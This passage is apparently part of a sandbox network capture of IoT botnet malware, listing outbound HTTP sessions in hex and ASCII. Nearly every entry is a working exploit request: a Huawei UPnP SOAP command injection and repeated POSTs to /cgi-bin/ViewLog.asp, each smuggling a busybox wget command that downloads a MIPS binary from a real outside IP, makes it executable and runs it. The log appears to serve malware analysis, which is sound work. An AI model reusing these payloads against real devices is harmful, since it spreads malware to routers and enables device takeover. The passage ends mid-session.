                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:31.782546043 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              107192.168.2.135423831.136.138.2538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:30.922549963 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:31.494669914 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:32.646919966 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:34.950628042 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:39.558594942 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:48.774586916 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:07.206573963 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:44.070517063 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              108192.168.2.134099294.111.39.1508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:31.112052917 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              109192.168.2.134285431.200.63.1698080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:31.139111042 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              110192.168.2.135256894.121.124.708080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:31.145170927 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              111192.168.2.134602095.179.157.388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:31.809623003 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              112192.168.2.134113031.136.56.1878080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:31.813219070 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:32.390686989 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:33.510636091 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:35.718645096 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:40.326698065 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:49.286581993 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:07.206557035 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:44.070516109 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              113192.168.2.135902262.29.126.1478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:31.849586010 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              114192.168.2.135395285.255.11.758080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:36.326539040 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:36.522336960 CET113INHTTP/1.1 400 Bad Request
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              115192.168.2.134914094.122.106.958080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:36.372819901 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              116192.168.2.135853231.200.62.438080
                                              TimestampBytes transferredDirectionData
